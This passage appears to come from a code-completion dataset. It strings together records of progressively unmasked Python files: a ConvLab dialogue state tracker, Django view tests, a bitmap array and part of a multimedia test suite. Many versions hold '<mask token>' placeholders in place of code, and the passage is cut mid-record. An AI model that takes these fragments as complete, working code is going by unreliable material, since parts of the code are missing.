"step-3": "<mask token>\n\n\nclass RuleDST(Tracker):\n \"\"\"Rule based DST which trivially updates new values from NLU result to states.\"\"\"\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n\n def init_session(self):\n self.state = init_state()\n",
"step-4": "import copy\nimport json\nimport os\nimport convlab\nfrom convlab.modules.dst.multiwoz.dst_util import init_state\nfrom convlab.modules.dst.multiwoz.dst_util import normalize_value\nfrom convlab.modules.dst.state_tracker import Tracker\nfrom convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA\n\n\nclass RuleDST(Tracker):\n \"\"\"Rule based DST which trivially updates new values from NLU result to states.\"\"\"\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n\n def init_session(self):\n self.state = init_state()\n",
"step-5": "# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT license.\n\nimport copy\nimport json\nimport os\n\nimport convlab\nfrom convlab.modules.dst.multiwoz.dst_util import init_state\nfrom convlab.modules.dst.multiwoz.dst_util import normalize_value\nfrom convlab.modules.dst.state_tracker import Tracker\nfrom convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA\n\n\nclass RuleDST(Tracker):\n \"\"\"Rule based DST which trivially updates new values from NLU result to states.\"\"\"\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix+'/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n # print('------------------{}'.format(user_act))\n if not isinstance(user_act, dict):\n raise Exception('Expect user_act to be <class \\'dict\\'> type but get {}.'.format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception('Error: domain <{}> not in new belief state'.format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n # if nvalue != v:\n # _log('domain {} slot {} value {} -> {}'.format(domain, k, v, nvalue))\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(self.value_dict, domain, k, v)\n else:\n # raise Exception('unknown slot name <{}> of domain <{}>'.format(k, domain))\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'.format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n\n self.state = new_state\n \n return self.state\n\n def init_session(self):\n self.state = init_state()",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from django.shortcuts import resolve_url as r
from django.test import TestCase
class coreGetHome(TestCase):
def setUp(self):
self.resp = self.client.get(r('core:core_home'))
def test_template_home(self):
self.assertTemplateUsed(self.resp, 'index.html')
def test_200_template_home(self):
self.assertEqual(200, self.resp.status_code)
|
normal
|
{
"blob_id": "d20e41dd7054ff133be264bebf13e4e218710ae5",
"index": 933,
"step-1": "<mask token>\n\n\nclass coreGetHome(TestCase):\n <mask token>\n <mask token>\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-2": "<mask token>\n\n\nclass coreGetHome(TestCase):\n\n def setUp(self):\n self.resp = self.client.get(r('core:core_home'))\n <mask token>\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-3": "<mask token>\n\n\nclass coreGetHome(TestCase):\n\n def setUp(self):\n self.resp = self.client.get(r('core:core_home'))\n\n def test_template_home(self):\n self.assertTemplateUsed(self.resp, 'index.html')\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-4": "from django.shortcuts import resolve_url as r\nfrom django.test import TestCase\n\n\nclass coreGetHome(TestCase):\n\n def setUp(self):\n self.resp = self.client.get(r('core:core_home'))\n\n def test_template_home(self):\n self.assertTemplateUsed(self.resp, 'index.html')\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
ba1466.pngMap = [
'11111111111111111111111111111100000000011111111111111111111111111000000000000000011111111111111111111111111111111111111111111111',
'11111111111111111111111111111110000000011111111111111111111111111000000000000000011111111111111111111111111111111111111111111111',
'11111111111111111111111111111110000000001111111111111111111111110000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111110000000001111111111111111111111000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111000000000011111111111111111101000000000000000000000000111111111111111111111111111111111111111111',
'11111111111111111111111111111111000000000011111111111111111100000000000000000000000000111111111111111111111111111111111111111111',
'11111111111111111111111111111111100000000100111111111111100000000000000000000000000000111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000000000111111111111100000000000000000000000000000111111111111111111111111111111111111111111',
'11111111111111111111111111111111100000001111111111111100000000000000000000000000000111111111111111111111111111111111111111111111',
'11111111111111111111111111111111000000011111111111111100000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111110000000011111111111110000000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111000000011111111111000000000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111100000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111100000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000011111111000000000000000000000000000000000000011111111111111111111111111111111111111111111',
'11111111111111111111111111111111111110000000111000000000000000000000000000000000000111111111111111111111111111111111111111111100',
'11111111111111111111111111111111111100000000001000000000000000000000000000000000011111111111111111111111111111111111111110100000',
'11111111111111111111111111111111111111111111110000000000000000000000000000000001111111111111111111111111111111100000000000000000',
'11111111111111111111111111111111111111111111110000000000000000000000000000000000111111111111111111111111111110100000000000000000',
'11111111111111111111111111111111111111111111100000000000000000000000000000000000111111111111111111110000000000000000000000000000',
'11111111111111111111111111111111111111111111100000000000000000000000000000000001111111111111111111100000000000000000000000000000',
'11111111111111111111111111111111111111111111100001111111100000101100000000000000111111110000000000000000000000000000000000000000',
'11111111111111111111111111111111111111111111111110111111111111111110000000000000110111000000000000000000000000000000000000000000',
'11111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000',
'11111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000',
'11111111111111111111111111111111111111111111111100110000000000000000000000000000000000000000000000000000000000000000000000000000',
'11111111111111111111111111111111111111000111000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'11111111111111110000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'11010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011111111111111',
'00000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111',
'11111111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010111111111111111111',
'11111111111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111',
'11111111111111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111',
'11111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111111111',
'11111111111111111111110010000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111111111111',
'11111111111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111111111111',
'11111111111111111111111111111111111000000000000000000000000000000000000000000000000000001111111111111111111111111111111111111111',
'11111111111111111111111111111111111100000000000000000000000000000000000000000000000000001111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111100111110000000000000000000001111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111100001000000011111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
]
|
normal
|
{
"blob_id": "dbefca59376e567a6116dec4e07c44b1fe301ca9",
"index": 9911,
"step-1": "<mask token>\n",
"step-2": "ba1466.pngMap = [\n '11111111111111111111111111111100000000011111111111111111111111111000000000000000011111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111110000000011111111111111111111111111000000000000000011111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111110000000001111111111111111111111110000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111110000000001111111111111111111111000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111000000000011111111111111111101000000000000000000000000111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111000000000011111111111111111100000000000000000000000000111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111100000000100111111111111100000000000000000000000000000111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111110000000000111111111111100000000000000000000000000000111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111100000001111111111111100000000000000000000000000000111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111000000011111111111111100000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111110000000011111111111110000000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111000000011111111111000000000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111100000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111100000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111110000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111110000011111111000000000000000000000000000000000000011111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111110000000111000000000000000000000000000000000000111111111111111111111111111111111111111111100'\n ,\n '11111111111111111111111111111111111100000000001000000000000000000000000000000000011111111111111111111111111111111111111110100000'\n ,\n '11111111111111111111111111111111111111111111110000000000000000000000000000000001111111111111111111111111111111100000000000000000'\n ,\n '11111111111111111111111111111111111111111111110000000000000000000000000000000000111111111111111111111111111110100000000000000000'\n ,\n '11111111111111111111111111111111111111111111100000000000000000000000000000000000111111111111111111110000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111111111100000000000000000000000000000000001111111111111111111100000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111111111100001111111100000101100000000000000111111110000000000000000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111111111111110111111111111111110000000000000110111000000000000000000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111111111111100110000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '11111111111111111111111111111111111111000111000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '11111111111111110000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '11010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100111111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011111111111111'\n ,\n '00000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111'\n ,\n '11111111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010111111111111111111'\n ,\n '11111111111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111'\n ,\n '11111111111111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111'\n ,\n '11111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111111111'\n ,\n '11111111111111111111110010000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111111111111'\n ,\n '11111111111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111000000000000000000000000000000000000000000000000000001111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111100000000000000000000000000000000000000000000000000001111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111111111111111100111110000000000000000000001111111111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111111111111111111111111111100001000000011111111111111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'\n ,\n '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'\n ]\n",
"step-3": "ba1466.pngMap = [\n'11111111111111111111111111111100000000011111111111111111111111111000000000000000011111111111111111111111111111111111111111111111',\n'11111111111111111111111111111110000000011111111111111111111111111000000000000000011111111111111111111111111111111111111111111111',\n'11111111111111111111111111111110000000001111111111111111111111110000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111110000000001111111111111111111111000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111000000000011111111111111111101000000000000000000000000111111111111111111111111111111111111111111',\n'11111111111111111111111111111111000000000011111111111111111100000000000000000000000000111111111111111111111111111111111111111111',\n'11111111111111111111111111111111100000000100111111111111100000000000000000000000000000111111111111111111111111111111111111111111',\n'11111111111111111111111111111111110000000000111111111111100000000000000000000000000000111111111111111111111111111111111111111111',\n'11111111111111111111111111111111100000001111111111111100000000000000000000000000000111111111111111111111111111111111111111111111',\n'11111111111111111111111111111111000000011111111111111100000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111110000000011111111111110000000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111000000011111111111000000000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111100000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111100000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111110000001111111100000000000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111110000011111111000000000000000000000000000000000000011111111111111111111111111111111111111111111',\n'11111111111111111111111111111111111110000000111000000000000000000000000000000000000111111111111111111111111111111111111111111100',\n'11111111111111111111111111111111111100000000001000000000000000000000000000000000011111111111111111111111111111111111111110100000',\n'11111111111111111111111111111111111111111111110000000000000000000000000000000001111111111111111111111111111111100000000000000000',\n'11111111111111111111111111111111111111111111110000000000000000000000000000000000111111111111111111111111111110100000000000000000',\n'11111111111111111111111111111111111111111111100000000000000000000000000000000000111111111111111111110000000000000000000000000000',\n'11111111111111111111111111111111111111111111100000000000000000000000000000000001111111111111111111100000000000000000000000000000',\n'11111111111111111111111111111111111111111111100001111111100000101100000000000000111111110000000000000000000000000000000000000000',\n'11111111111111111111111111111111111111111111111110111111111111111110000000000000110111000000000000000000000000000000000000000000',\n'11111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000',\n'11111111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000',\n'11111111111111111111111111111111111111111111111100110000000000000000000000000000000000000000000000000000000000000000000000000000',\n'11111111111111111111111111111111111111000111000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'11111111111111110000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'11010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100111111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011111111111111',\n'00000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111',\n'11111111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010111111111111111111',\n'11111111111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111',\n'11111111111111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111',\n'11111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111111111',\n'11111111111111111111110010000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111111111111',\n'11111111111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111111111111111',\n'11111111111111111111111111111111111000000000000000000000000000000000000000000000000000001111111111111111111111111111111111111111',\n'11111111111111111111111111111111111100000000000000000000000000000000000000000000000000001111111111111111111111111111111111111111',\n'11111111111111111111111111111111111111111111111100111110000000000000000000001111111111111111111111111111111111111111111111111111',\n'11111111111111111111111111111111111111111111111111111111111100001000000011111111111111111111111111111111111111111111111111111111',\n'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',\n'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',\n'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',\n'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',\n]\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class MultimediaTest(BaseTestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_add_media(self):
"""
Tests create media
"""
self.login_editor()
form_data = minimal_form_data()
response = self.client.post('/multimedia/new', form_data)
self.assertContains(response,
'Por favor verifique os campos obrigatórios')
self.assertContains(response,
'Você precisa inserir pelo menos um descritor de assunto')
self.assertContains(response,
'Você precisa selecionar pelo menos uma área temática')
form_data = complete_form_data()
response = self.client.post('/multimedia/new', form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
self.assertEquals(Media.objects.all()[0].cooperative_center_code,
'BR1.1')
def test_edit_media(self):
"""
Tests edit media
"""
self.login_editor()
create_media_object()
media_test = Media.objects.all()[0]
url = '/multimedia/edit/{0}'.format(media_test.id)
response = self.client.get(url)
self.assertContains(response, media_test.title)
form_data = complete_form_data()
form_data['status'] = '1'
response = self.client.post(url, form_data)
self.assertContains(response,
'é necessário ter pelo menos um descritor')
form_data['status'] = '0'
response = self.client.post(url, form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
def test_delete_media(self):
"""
Tests delete media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/delete/1')
self.assertContains(response, 'Você tem certeza que deseja apagar?')
response = self.client.post('/multimedia/delete/1')
self.assertTrue(Media.objects.filter(id=1).count() == 0)
self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)
self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(
) == 0)
self.assertRedirects(response, '/multimedia/')
def test_list_media_type(self):
"""
Tests list media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-types/')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
response = self.client.get('/multimedia/media-types/')
self.assertContains(response, 'Video')
def test_add_media_type(self):
"""
Tests create media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-type/new')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',
'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',
'mediatypelocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/media-type/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/media-types')
self.assertContains(response, 'Foto')
def test_list_media_collection(self):
"""
Tests list of media collection
"""
self.login_editor()
MediaCollection.objects.create(name='Coleção 1', description=
